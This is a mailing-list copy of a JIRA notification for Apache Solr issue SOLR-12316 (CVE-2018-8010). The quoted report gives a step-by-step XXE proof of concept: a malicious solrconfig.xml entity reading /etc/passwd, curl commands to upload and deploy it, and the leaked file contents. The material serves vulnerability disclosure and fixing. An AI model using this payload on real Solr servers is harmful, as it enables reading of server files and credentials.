You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@lucene.apache.org by "ASF subversion and git services (JIRA)" <ji...@apache.org> on 2018/05/21 11:56:00 UTC
[jira] [Commented] (SOLR-12316) CVE-2018-8010: Prevent XXE in
solrconfig.xml and managed-schema(.xml)
[ https://issues.apache.org/jira/browse/SOLR-12316?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482425#comment-16482425 ]
ASF subversion and git services commented on SOLR-12316:
--------------------------------------------------------
Commit 63e213916cd99490973c0473d1969bd5dcd7edd8 in lucene-solr's branch refs/heads/master from [~thetaphi]
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=63e2139 ]
SOLR-12316: Make CVE public
> CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)
> ---------------------------------------------------------------------
>
> Key: SOLR-12316
> URL: https://issues.apache.org/jira/browse/SOLR-12316
> Project: Solr
> Issue Type: Bug
> Security Level: Public(Default Security Level. Issues are Public)
> Affects Versions: 5.5.5, 6.6.3, 7.3
> Reporter: Ishan Chattopadhyaya
> Assignee: Uwe Schindler
> Priority: Blocker
> Fix For: 6.6.4, 7.4, master (8.0), 7.3.1
>
> Attachments: SOLR-12316-testfix.patch, SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, solr.log
>
>
> While trying to work around the issue of being unable to upload large files to ZK (without jute.maxbuffer setting), [~antz] brought to my notice that he was able to successfully achieve that using XXE. That alarmed me! Our managed-schema and solrconfig.xml parse XXEs!
> Here's a very nasty attack I could execute using this and configset upload functionality:
> Step 1: Create a configset with just two files in a directory called "minimal":
> schema.xml:
> {code}
> <schema name="minimal" version="1.1">
> <fieldType name="string" class="solr.StrField"/>
> <dynamicField name="*" type="string" indexed="true" stored="true"/>
> </schema>
> {code}
> solrconfig.xml
> {code}
> <?xml version="1.0" ?>
> <!DOCTYPE doc [
> <!ENTITY passwdFile SYSTEM "file:///etc/passwd">
> ]>
> <config>
> <dataDir>${solr.data.dir:}</dataDir>
> <directoryFactory name="DirectoryFactory"
> class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/>
> <schemaFactory class="ClassicIndexSchemaFactory"/>
> <luceneMatchVersion>7.3.0</luceneMatchVersion>
> <updateHandler class="solr.DirectUpdateHandler2">
> <commitWithin>
> <softCommit>${solr.commitwithin.softcommit:true}</softCommit>
> </commitWithin>
> </updateHandler>
> <requestHandler name="/select" class="solr.SearchHandler">
> <lst name="defaults">
> <str name="echoParams">explicit</str>
> <str name="indent">true</str>
> <str name="df">text</str>
> <str name="password">&passwdFile;</str>
> </lst>
> </requestHandler>
> </config>
> {code}
> Step 2: Upload the minimal directory to Solr using configset upload API:
> {code}
> [ishan@x260 solr] $ (cd minimal && zip -r - *) | curl -X POST --header "Content-Type:application/octet-stream" --data-binary @- "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=mybadconfigset"
> adding: schema.xml (deflated 42%)
> adding: solrconfig.xml (deflated 50%)
> {
> "responseHeader":{
> "status":0,
> "QTime":23}}
> {code}
> Step 3: Create a collection using this configset
> {code}
> [ishan@x260 solr] $ curl "http://localhost:8983/solr/admin/collections?action=CREATE&name=mybadcoll&numShards=1&collection.configName=mybadconfigset"
> {
> "responseHeader":{
> "status":0,
> "QTime":3431},
> "success":{
> "192.168.1.6:8983_solr":{
> "responseHeader":{
> "status":0,
> "QTime":2062},
> "core":"mybadcoll_shard1_replica_n1"}}}
> {code}
> Step 4: Use Config API to check the select handler's config. The file is revealed!
> {code}
> [ishan@x260 solr] $ curl "http://localhost:8983/solr/mybadcoll/config/requestHandler"|jq
> % Total % Received % Xferd Average Speed Time Time Time Current
> Dload Upload Total Spent Left Speed
> 100 7939 100 7939 0 0 7939 0 0:00:01 --:--:-- 0:00:01 323k
> {
> "responseHeader": {
> "status": 0,
> "QTime": 16
> },
> "config": {
> "requestHandler": {
> "/select": {
> "name": "/select",
> "class": "solr.SearchHandler",
> "defaults": {
> "echoParams": "explicit",
> "indent": "true",
> "df": "text",
> "password": "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\nftp:x:14:50:FTP User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\nsystemd-timesync:x:999:998:systemd Time Synchronization:/:/sbin/nologin\nsystemd-network:x:192:192:systemd Network Management:/:/sbin/nologin\nsystemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin\ndbus:x:81:81:System message bus:/:/sbin/nologin\npolkitd:x:998:997:User for polkitd:/:/sbin/nologin\ngeoclue:x:997:996:User for geoclue:/var/lib/geoclue:/sbin/nologin\nrtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin\npulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin\navahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin\nchrony:x:996:992::/var/lib/chrony:/sbin/nologin\nrpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin\nusbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin\nradvd:x:75:75:radvd user:/:/sbin/nologin\nqemu:x:107:107:qemu user:/:/sbin/nologin\napache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin\ncolord:x:995:990:User for colord:/var/lib/colord:/sbin/nologin\nabrt:x:173:173::/etc/abrt:/sbin/nologin\nsaslauth:x:994:76:Saslauthd user:/run/saslauthd:/sbin/nologin\nopenvpn:x:993:988:OpenVPN:/etc/openvpn:/sbin/nologin\nnm-openvpn:x:992:987:Default user for running openvpn spawned by NetworkManager:/:/sbin/nologin\ngdm:x:42:42::/var/lib/gdm:/sbin/nologin\nsetroubleshoot:x:991:985::/var/lib/setroubleshoot:/sbin/nologin\nrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin\nnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin\nnm-openconnect:x:990:984:NetworkManager user for OpenConnect:/:/sbin/nologin\ngnome-initial-setup:x:989:983::/run/gnome-initial-setup/:/sbin/nologin\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin\ntcpdump:x:72:72::/:/sbin/nologin\nishan:x:1000:1000:Ishan Chattopadhyaya:/home/ishan:/bin/bash\nsystemd-coredump:x:982:982:systemd Core Dumper:/:/sbin/nologin\nakmods:x:981:981:User is used by akmods to build akmod packages:/var/cache/akmods/:/sbin/nologin\nkube:x:980:978:Kubernetes user:/:/sbin/nologin\nzookeeper:x:979:977:ZooKeeper service account:/var/lib/zookeeper:/sbin/nologin\nntp:x:38:38::/etc/ntp:/sbin/nologin\nautossh:x:977:975:autossh service account:/etc/autossh:/usr/sbin/nologin\nnginx:x:976:974:Nginx web server:/var/lib/nginx:/sbin/nologin\ngluster:x:975:972:GlusterFS daemons:/run/gluster:/sbin/nologin\npipewire:x:974:971:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin\nunbound:x:973:970:Unbound DNS resolver:/etc/unbound:/sbin/nologin\nnetdata:x:972:969:NetData User:/var/lib/netdata:/sbin/nologin\ndnsmasq:x:967:967:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin\n"
> }
> {code}
--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@lucene.apache.org
For additional commands, e-mail: dev-help@lucene.apache.org